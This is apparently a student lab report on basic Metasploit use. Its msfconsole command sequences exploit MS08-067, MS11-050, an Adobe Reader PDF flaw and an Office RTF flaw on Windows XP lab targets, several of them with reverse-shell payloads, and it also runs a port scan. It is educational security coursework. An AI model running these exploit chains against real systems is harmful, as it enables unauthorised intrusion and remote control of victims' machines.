网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用
1.实践内容(3.5分)
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。
1.1一个主动攻击实践,如ms08_067; (1分)
MS08-067漏洞攻击
这次使用Metaploit框架中的MS08_067渗透攻击模块对windows XP SP3(English)(没有使用DEF和ASLR安全防护机制)靶机进行渗透测试。
- 攻击机:kali
- 靶机:windows XP SP3(English)
指令如下所示:
msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set LHOST 192.168.46.132 //攻击机IP
set LPORT 5215 //设置端口号
set RHOST 192.168.46.133 //靶机IP
set target 0 //自动选择目标系统类型,匹配度较高
exploit
连接成功:
可以看到下图中“192.168.46.133”即靶机的IP地址,所以攻击成功:
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
浏览器渗透攻击——MS11-050
- 攻击机:kali
- 靶机:WindowsXP Professional sp2
输入如下指令,首先进入控制台:
msfconsole
use windows/browser/ms11_050_mshtml_cobjectelement
set payload generic/shell_reverse_tcp
set LHOST 192.168.46.132
set LPORT 5215
set URIPATH 20155215
exploit
访问http://192.168.130.130:8080/2015d
,网页出现如下的内容:
连接成功:
1.3 一个针对客户端的攻击,如Adobe,Office;(1分)
A.针对Adobe Reader软件的渗透攻击——adobe_toolbutton
- 攻击机:kali
- 靶机:windowsXP Professional sp2
- Adobe版本:9.3
> use windows/fileformat/adobe_cooltype_sing
> set payload windows/meterpreter/reverse_tcp //tcp反向回连
> set LHOST 192.168.130.130 //攻击机ip
> set LPORT 5303 //攻击端口
> set FILENAME 20155303-2.pdf //设置生成pdf文件的名字
> exploit //攻击
生成了名为“20155215”的PDF文件:
将生成的pdf文件拷贝到靶机上。
在kali上输入back退出当前模块,进入监听模块,输入以下命令:
图中的“192.168.46.134”即为靶机的IP地址,也就是说攻击成功:
B.针对Office软件的渗透攻击——MS10-087
- 攻击机:kali
- 靶机:windowsXP Professional sp2
- Office版本:2003
msfconsole
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
set CMD calc.exe
exploit
使用show options命令查看一些参数值,比如文件名、绑定程序等等。
将生成的文件从/root/.msf4/local/msf.rft拷贝到靶机上,并使用Office2003打开。
不管第几次打开,都会提示错误:
然后我们可以看到计算器自动打开了,攻击成功:
1.4 成功应用任何一个辅助模块。(0.5分)
我用的是auxiliary/scanner/portscan/tcp
指令如下所示:
show auxiliary
use auxiliary/scanner/portscan/tcp
show options
set RHOSTS 192.168.46.135
set THREADS 15
exploit
show auxiliary
之后出现下面的各种辅助模块,我选的就是红框框出的:
show options
可以让我们查看有哪些参数项:
设置相关参数如下:
连接成功,可以看到TCP端口开放:
2.1.基础问题回答
用自己的话解释什么是exploit
,payload
,encode
.
答:
exploit
是攻击模块,工作原理就是利用发现的安全漏洞对目标系统进行攻击,植入并运行攻击载荷,从而获得对远程目标系统访问权的。payload
payload,即载荷,应该是指在程序中起关键作用的代码,通常作为攻击者打开会话连接的有效载荷,用于渗透攻击等。encode
指的是可以对一段代码进行编码,改变其代码特征,但是不改变其本质。
2.2.实践总结与体会
这次的实验乍一看感觉有点复杂,真的去做了之后觉得还行。主要是因为我们是“站在巨人的肩膀”上,是以已知的方式攻击已经被发现的漏洞,所以就感觉不会太困难的。但是做最后一个任意模块的时候,就需要自己动脑筋啦,因为要跟别人不一样,所以我还是花了一点心思,感觉还是很有收获的。
网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用的更多相关文章
- 2017-2018-2 20155228 《网络对抗技术》 实验九:Web安全基础
2017-2018-2 20155228 <网络对抗技术> 实验九:Web安全基础 1. 实践内容 1.1 标理解常用网络攻击技术的基本原理 1.2 在Webgoat实验环境下实践相关实验 ...
- 20145203盖泽双 《网络对抗技术》实践九:Web安全基础实践
20145203盖泽双 <网络对抗技术>实践九:Web安全基础实践 1.实践目标 1.理解常用网络攻击技术的基本原理. 2.Webgoat下进行相关实验:SQL注入攻击.XSS攻击.CSR ...
- 20155201 李卓雯 《网络对抗技术》实验一 逆向及Bof基础
20155201 李卓雯 <网络对抗技术>实验一 逆向及Bof基础 一.实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,f ...
- # 2017-2018-2 20155231《网络对抗技术》实验九: Web安全基础实践
2017-2018-2 20155231<网络对抗技术>实验九: Web安全基础实践 实验要求: 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 实验内容: ( ...
- 20145314郑凯杰《网络对抗技术》实验1 逆向及Bof基础实践
20145314郑凯杰<网络对抗技术>实验1 逆向及Bof基础实践 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数 ...
- 2017-2018-2 20155229《网络对抗技术》Exp1:逆向及Bof基础实践
逆向及Bof基础实践 实践基础知识 管道命令: 能够将一个命令的执行结果经过筛选,只保留需要的信息. cut:选取指定列. 按指定字符分隔:只显示第n 列的数据 cut -d '分隔符' -f n 选 ...
- 2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础
实践过程记录 下载wegot并配置好java环境后 输入java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar 在浏览器输入localhost:80 ...
- 20145234黄斐《网络对抗技术》实验九、Web安全基础实践
PS:我是分了两次做的这次试验,第二次实验的时候电脑出了一点问题熄火了……原本后面的是有图的结果博客没保存图没了…… WebGoat WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
随机推荐
- 如何在Vue中建立全局引用或者全局命令
1 一般在vue中,有很多vue组件,这些组件每个都是一个文件.都可能需要引用到相同模块(或者插件).我们不想每个文件都import 一次模块. 如果是基于vue.js编写的插件我们可以用 Vue.u ...
- 使用kafka consumer api时,中文乱码问题
使用Intelli idea调试kafka low consumer时,由于broker存储的message有中文, idea中console端是可以正确显示的 然后mvn package打包到服务器 ...
- Centos7 用yum命令安装LAMP环境(php+Apache+Mysql)以及php扩展
1.yum -y update // 更新系统 1.1)yum -y install gcc g++ gcc-c++ make kernel-devel kernel-headers 1.2)v ...
- 使用FireFox插件RESTClient、HttpRequester模拟http(get post)请求
我们写好一个接口后,需要进行测试.有时我们会写一个html表单提交,无疑增加了工作量,尤其是当参数比较多或者传json或xml数据时,效率更是大大降低.我们可以使用基于FireFox的RESTClie ...
- CSS揭秘(二)背景与边框
Chapter2 背景与边框 1. 半透明边框 基础:了解 RGBA & HSLA 颜色(色调 0~360.饱和度.亮度 (0%黑色~100%白色).透明度) 默认情况下,背景在边框的下层,容 ...
- winform中容器是如使用的
1.容器 (1)FlowLayouPanel 普通容器[内部流式布局] (2)Groupbox 带有标题的普通容器[内部普通布局,超出范围隐藏] (3)Panel 普通容器[内部普通布局,超出范围隐藏 ...
- MySQL安全策略
0.导读 MySQL被运用于越来越多的业务中,在关键业务中对数据安全性的要求也更高,如何保证MySQL的数据安全? MySQL被运用于越来越多的业务中,在关键业务中对数据安全性的要求也更高,如何保证M ...
- AD域创建用户无法登录
怎么登录都无法登录 解决办法: 创建用户的时候 将用户下次登录时须更改密码的勾去掉 不然需要修改密码才可以登录
- Bitlocker驱动器加密使用
前言 Bitlocker驱动器加密可以将磁盘加密,确保数据的安全.如果被加密保护的磁盘是Windows Server 2012操作系统磁盘,即使他被拿到另外一台计算机启动,除非已解锁,否则无法启动 ...
- 实现一个协程版mysql连接池
实现一个协程版的mysql连接池,该连接池支持自动创建最小连接数,自动检测mysql健康:基于swoole的chanel. 最近事情忙,心态也有点不积极.技术倒是没有落下,只是越来越不想写博客了.想到 ...